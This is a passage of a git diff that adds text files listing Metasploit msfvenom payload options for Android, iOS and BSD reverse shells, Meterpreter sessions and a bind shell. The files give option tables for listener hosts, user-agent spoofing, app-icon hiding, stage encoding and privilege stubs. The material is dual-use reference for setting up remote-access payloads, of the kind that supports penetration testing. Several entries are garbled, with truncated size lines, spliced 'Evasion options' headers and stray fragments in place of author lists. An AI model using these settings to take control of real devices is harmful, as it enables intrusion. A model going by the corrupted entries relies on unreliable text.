Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_https.txt b/msfvenom/payload_options/android-shell-reverse_https.txt new file mode 100644 index 0000000..74c946e --- /dev/null +++ b/msfvenom/payload_options/android-shell-reverse_https.txt 
@@ -0,0 +1,66 @@ + + Name: Command Shell, Android Reverse HTTPS Stager + Module: payload/android/shell/reverse_https + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/shell/reverse_https: +========================= + +sploit.com> + anwarelmakrahy + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Spawn a piped command shell (sh). + + Tunnel communication over HTTPS + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_tcp.txt b/msfvenom/payload_options/android-shell-reverse_tcp.txt new file mode 100644 index 0000000..984e956 --- /dev/null +++ b/msfvenom/payload_options/android-shell-reverse_tcp.txt 
@@ -0,0 +1,54 @@ + + Name: Command Shell, Android Reverse TCP Stager + Module: payload/android/shell/reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 10209 + Rank: Normal + +Provided by: + mihi + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a piped command shell (sh). + + Connect back stager + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..0158ba1 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt 
@@ -0,0 +1,64 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTP Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_http + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 796904 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1c2de14 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt 
@@ -0,0 +1,65 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTPS Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_https + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size +Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https: +========================= + + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..a9df340 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,58 @@ + + Name: Apple_iOS Meterpreter, Reverse TCP Inline + Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 796904 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when 
generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..6251d70 --- /dev/null +++ b/msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt 
@@ -0,0 +1,38 @@ + + Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline + Module: payload/apple_ios/aarch64/shell_reverse_tcp + Platform: Apple_iOS + Arch: aarch64 +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..3e181fc --- /dev/null 
+++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt @@ -0,0 +1,63 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTP Inline + Module: payload/apple_ios/armle/meterpreter_reverse_http + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size +Evasion options for payload/apple_ios/armle/meterpreter_reverse_http: +========================= + +ok + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..20fb9ec --- /dev/null +++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt 
@@ -0,0 +1,65 @@ + + Name: Apple_iOS Meterpreter, Reverse HTTPS Inline + Module: payload/apple_ios/armle/meterpreter_reverse_https + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size +Evasion options for payload/apple_ios/armle/meterpreter_reverse_https: +========================= + +k + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies 
specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cbf140e --- /dev/null +++ b/msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,58 @@ + + Name: Apple_iOS Meterpreter, Reverse TCP Inline + Module: payload/apple_ios/armle/meterpreter_reverse_tcp + Platform: Apple_iOS + Arch: armle +Needs Admin: No + Total size: 643824 + Rank: Normal + +Provided by: + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run the Meterpreter / Mettle server payload (stageless) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating 
the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt new file mode 100644 index 0000000..e21c97f --- /dev/null +++ b/msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt 
@@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Bind TCP Inline + Module: payload/bsd/sparc/shell_bind_tcp + Platform: BSD + Arch: sparc +Needs Admin: No + Total size: 164 + Rank: Normal + +Provided by: + vlad902 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt new file mode 100644 index 0000000..c6e6824 --- /dev/null +++ b/msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt 
